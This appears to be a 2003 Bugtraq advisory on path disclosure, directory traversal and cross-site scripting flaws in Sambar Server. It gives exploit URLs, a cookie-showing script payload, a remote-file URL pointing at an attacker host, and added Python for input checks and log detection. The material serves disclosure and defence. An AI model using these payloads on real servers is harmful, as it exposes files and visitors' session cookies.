Bugtraq mailing list archives

[SCSA-012] Multiple vulnerabilities in Sambar Server
From: Grégory Le Bras <gregory.lebras () security-corporation com>
Date: 27 Mar 2003 17:26:19 -0000



________________________________________________________________________

Security Corporation Security Advisory [SCSA-012]
________________________________________________________________________

PROGRAM: Sambar Server
HOMEPAGE: http://www.sambar.com/
VULNERABLE VERSIONS: 5.3 and prior 
________________________________________________________________________


DESCRIPTION
________________________________________________________________________

"Sambar Server is the new standard in high performance multi-functional 
servers with features rivaling other commercial products selling 
separately for several hundreds of dollars. It's Winsock2 compliant Win32
integration functions on Windows 95, Windows 98, Windows NT, Win2000, 
and XP as a service or as an application."
(direct quote from http://sambar.jalyn.net) 


DETAILS & EXPLOITS
________________________________________________________________________


¤ Path Disclosure :

Sambar's default installation ships testcgi.exe and environ.pl in the
CGI bin directory. Both are reachable by remote users and print the CGI
environment, which reveals details of the operating system and of the
web server's on-disk directory layout.

These issues are triggered by a remote user sending a crafted HTTP
request.


- Exploits :

http://[target]/cgi-bin/environ.pl

http://[target]/cgi-bin/testcgi.exe


These requests produce the following output:

- environ.pl : 
--------------

Sambar Server CGI Environment Variables 
GATEWAY_INTERFACE: CGI/1.1 
PATH_INFO: 
PATH_TRANSLATED: C:/sambar53/cgi-bin/environ.pl 
QUERY_STRING: 
REMOTE_ADDR: 127.0.0.1 
REMOTE_HOST: 
REMOTE_USER: 
REQUEST_METHOD: GET 
DOCUMENT_NAME: environ.pl 
DOCUMENT_URI: /cgi-bin/environ.pl 
SCRIPT_NAME: /cgi-bin/environ.pl 
SCRIPT_FILENAME: C:/sambar53/cgi-bin/environ.pl 
SERVER_NAME: localhost 
SERVER_PORT: 80 
SERVER_PROTOCOL: HTTP/1.1 
SERVER_SOFTWARE: SAMBAR 
CONTENT_LENGTH: 0 
CONTENT: 


- testcgi.exe :
---------------

Test CGI ... Version 1.00 [ build date 8-03-97 ]

QUERY_STRING 
PATH_INFO 
PATH_TRANSLATED C:/sambar53/cgi-bin/testcgi.exe 
SCRIPT_NAME /cgi-bin/testcgi.exe 
SCRIPT_FILENAME C:/sambar53/cgi-bin/testcgi.exe 
DOCUMENT_ROOT C:/sambar53/docs/ 
HTTP_USER_AGENT Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) 
REMOTE_ADDR 127.0.0.1 
REMOTE_HOST 
SERVER_NAME localhost 
SERVER_PROTOCOL HTTP/1.1 
SERVER_SOFTWARE SAMBAR 
CONTENT_TYPE 

----------------------------


¤ Directory Disclosure :

Other vulnerabilities were found in Sambar that allow an attacker to
reveal the contents of files and directories on the web server that
should not be exposed.

They can be exploited simply by requesting a crafted URL for the
iecreate.stm or ieedit.stm application with '../' appended to the
parameter.

- Exploits :

http://[target]/sysuser/docmgr/iecreate.stm?template=../

http://[target]/sysuser/docmgr/ieedit.stm?url=../


----------------------------


¤ Cross Site Scripting :

Many exploitable bugs were found in Sambar Server that cause script
execution on the client's computer when a crafted URL is followed.

This kind of attack, known as "Cross-Site Scripting", is present in
many sections of the web site: an attacker can inject specially crafted
links and/or other malicious scripts.

- Exploits : 

http://[target]/netutils/ipdata.stm?ipaddr=[hostile_code]

http://[target]/netutils/whodata.stm?sitename=[hostile_code]

http://[target]/netutils/findata.stm?user=[hostile_code]

http://[target]/netutils/findata.stm?host=[hostile_code]

http://[target]/isapi/testisa.dll?check1=[hostile_code]

http://[target]/cgi-bin/environ.pl?param1=[hostile_code]

http://[target]/samples/search.dll?query=[hostile_code]&logic=AND

http://[target]/wwwping/index.stm?wwwsite=[hostile_code]

http://[target]/syshelp/stmex.stm?foo=[hostile_code]&bar=456

http://[target]/syshelp/stmex.stm?foo=123&bar=[hostile_code]

http://[target]/syshelp/cscript/showfunc.stm?func=[hostile_code]

http://[target]/syshelp/cscript/showfncs.stm?pkg=[hostile_code]

http://[target]/syshelp/cscript/showfnc.stm?pkg=[hostile_code]

http://[target]/sysuser/docmgr/ieedit.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/ieedit.stm?name=[hostile_code]

http://[target]/sysuser/docmgr/edit.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/edit.stm?name=[hostile_code]

http://[target]/sysuser/docmgr/iecreate.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/create.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/info.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/info.stm?name=[hostile_code]

http://[target]/sysuser/docmgr/ftp.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/htaccess.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/mkdir.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/rename.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/rename.stm?name=[hostile_code]

http://[target]/sysuser/docmgr/search.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/search.stm?query=[hostile_code]

http://[target]/sysuser/docmgr/sendmail.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/sendmail.stm?name=[hostile_code]

http://[target]/sysuser/docmgr/template.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/update.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/update.stm?name=[hostile_code]

http://[target]/sysuser/docmgr/vccheckin.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/vccheckin.stm?name=[hostile_code]

http://[target]/sysuser/docmgr/vccreate.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/vccreate.stm?name=[hostile_code]

http://[target]/sysuser/docmgr/vchist.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/vchist.stm?name=[hostile_code]

http://[target]/cgi-bin/testcgi.exe?[hostile_code]


- Another Cross Site Scripting issue can be exploited through a remote
file that contains the hostile code, like this :

http://[target]/sysuser/docmgr/ieedit.stm?url=http://[attacker]/hostile_file.htm


The hostile code could be :

[script]alert("Cookie="+document.cookie)[/script]

(opens a window showing the visitor's cookie.)

(replace [] with <>)
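The three findings above all come down to two missing server-side checks: a
template name taken from the request is opened without being confined to the
document root (the '../' case and the remote-file case), and request
parameters are copied into the page without output encoding (the XSS case).
The following Python is an added example written for this page; it is not
Sambar's code, and the document root, the handler functions and the endpoint
routing are assumptions for illustration, not the server's internals.

```python
# Added example for this advisory, not Sambar code. It shows the two checks
# whose absence the findings describe: confining a user-supplied template
# name to the document root, and HTML-escaping a reflected parameter.
import html
import os
from typing import Optional, Tuple
from urllib.parse import urlsplit, parse_qs

DOC_ROOT = "/srv/www/docs"   # assumed document root, not Sambar's default


def resolve_template(doc_root: str, user_path: str) -> Optional[str]:
    """Map a template name from the request onto a file strictly below doc_root.

    Returns None when the name is empty, carries a NUL byte, names a URL or a
    drive (the 'url=http://[attacker]/...' case), or escapes the root through
    '..' segments (the 'template=../' case)."""
    if not user_path or "\x00" in user_path:
        return None
    if urlsplit(user_path).scheme:          # http://..., c:/..., etc.
        return None
    # The product is a Win32 server, so treat '\' like '/' before normalising.
    relative = user_path.replace("\\", "/").lstrip("/")
    root = os.path.realpath(doc_root)
    candidate = os.path.realpath(os.path.join(root, relative))
    # realpath collapses '..' (and symlinks); the result must still lie under
    # the root, compared on a whole path component, not a string prefix.
    if not candidate.startswith(root + os.sep):
        return None
    return candidate


def render_ipdata(ipaddr: str) -> str:
    """Reflect the 'ipaddr' parameter into the page with output encoding."""
    return "<p>Lookup for host: %s</p>" % html.escape(ipaddr, quote=True)


def render_ipdata_unsafe(ipaddr: str) -> str:
    """The pattern the advisory reports: the parameter is copied verbatim."""
    return "<p>Lookup for host: %s</p>" % ipaddr


def handle(url: str, doc_root: str = DOC_ROOT) -> Tuple[int, str]:
    """Hypothetical dispatcher for two of the advisory's endpoints."""
    parts = urlsplit(url)
    params = parse_qs(parts.query, keep_blank_values=True)

    def first(name: str) -> str:
        return params.get(name, [""])[0]

    if parts.path == "/netutils/ipdata.stm":
        return 200, render_ipdata(first("ipaddr"))
    if parts.path == "/sysuser/docmgr/iecreate.stm":
        target = resolve_template(doc_root, first("template"))
        if target is None:
            return 400, "invalid template name"
        return 200, "template resolved to " + target
    return 404, "no such page"


if __name__ == "__main__":
    print(handle("http://host/sysuser/docmgr/iecreate.stm?template=../"))
    print(handle("http://host/netutils/ipdata.stm?ipaddr=<script>alert(1)</script>"))
```

The traversal check relies on canonicalising first and comparing afterwards;
checking the raw string for "../" alone misses backslashes, URL-encoded dots
and absolute paths, which is why the example normalises separators, rejects
anything with a scheme and then asks the operating system for the real path.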


SOLUTIONS
________________________________________________________________________

No solution for the moment.
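Since no vendor fix is listed, an administrator can at least spot probes for
these three issues in the server's access log. The following Python is an
added example, not part of the advisory and not a Sambar feature; it assumes
Common Log Format lines, and the sample entries are constructed to mirror the
request URLs listed in the details section above.

```python
# Added example (not from the advisory): flag access-log requests matching the
# three issue classes in this advisory. Sample lines are constructed.
import re
from urllib.parse import urlsplit, parse_qsl, unquote

CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')

# Constructed sample log; the requests mirror the advisory's URLs.
SAMPLE_LOG = """\
203.0.113.9 - - [27/Mar/2003:17:26:19 +0000] "GET /cgi-bin/environ.pl HTTP/1.1" 200 612
203.0.113.9 - - [27/Mar/2003:17:26:20 +0000] "GET /sysuser/docmgr/iecreate.stm?template=../ HTTP/1.1" 200 4120
203.0.113.9 - - [27/Mar/2003:17:26:21 +0000] "GET /netutils/ipdata.stm?ipaddr=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 833
203.0.113.9 - - [27/Mar/2003:17:26:22 +0000] "GET /sysuser/docmgr/ieedit.stm?url=http://192.0.2.7/hostile_file.htm HTTP/1.1" 200 1950
198.51.100.4 - - [27/Mar/2003:17:30:00 +0000] "GET /index.stm HTTP/1.1" 200 2048
"""

INFO_CGIS = {"/cgi-bin/environ.pl", "/cgi-bin/testcgi.exe"}
# (path, parameter) pairs whose value names a file or URL on the server side
DOCMGR_FILE_PARAMS = {("/sysuser/docmgr/iecreate.stm", "template"),
                      ("/sysuser/docmgr/ieedit.stm", "url")}
SCRIPT_MARKERS = ("<script", "javascript:", "onerror=", "onload=")


def decode(value: str) -> str:
    """Percent-decode twice so a double-encoded payload is still visible."""
    return unquote(unquote(value)).lower()


def classify(target: str) -> list:
    """Return the list of issue tags a request target matches (empty if none)."""
    parts = urlsplit(target)
    path = unquote(parts.path).lower()
    tags = []
    if path in INFO_CGIS:
        tags.append("cgi-env-disclosure")
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        value = decode(raw)
        if (path, name.lower()) in DOCMGR_FILE_PARAMS:
            if "../" in value or "..\\" in value:
                tags.append("docmgr-traversal")
            if value.startswith(("http://", "https://", "ftp://")):
                tags.append("docmgr-remote-include")
        # testcgi.exe?[payload] has no '=' so the payload lands in the name
        if any(m in decode(name) or m in value for m in SCRIPT_MARKERS):
            tags.append("xss-probe")
    return tags


def scan(log_text: str) -> list:
    """Return (client, request-target, tags) for every flagged log line."""
    hits = []
    for line in log_text.splitlines():
        m = CLF.match(line)
        if not m:
            continue
        client, _ts, _method, target, _status = m.groups()
        tags = classify(target)
        if tags:
            hits.append((client, target, tags))
    return hits


if __name__ == "__main__":
    for client, target, tags in scan(SAMPLE_LOG):
        print(client, ",".join(tags), target)
```

Requests to environ.pl and testcgi.exe are flagged on the path alone, since
the advisory gives them no legitimate remote use; the two docmgr parameters
are inspected only after decoding, and the script markers are looked for in
parameter names as well as values because the testcgi.exe variant carries
its payload without a name.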


VENDOR STATUS 
________________________________________________________________________

The vendor has reportedly been notified.


LINKS
________________________________________________________________________

- http://www.security-corp.org/index.php?ink=4-15-1

- Version Française :
http://www.security-corporation.com/index.php?id=advisories&a=012-FR


------------------------------------------------------------------------
Grégory Le Bras aka GaLiaRePt | http://www.Security-Corporation.com
------------------------------------------------------------------------


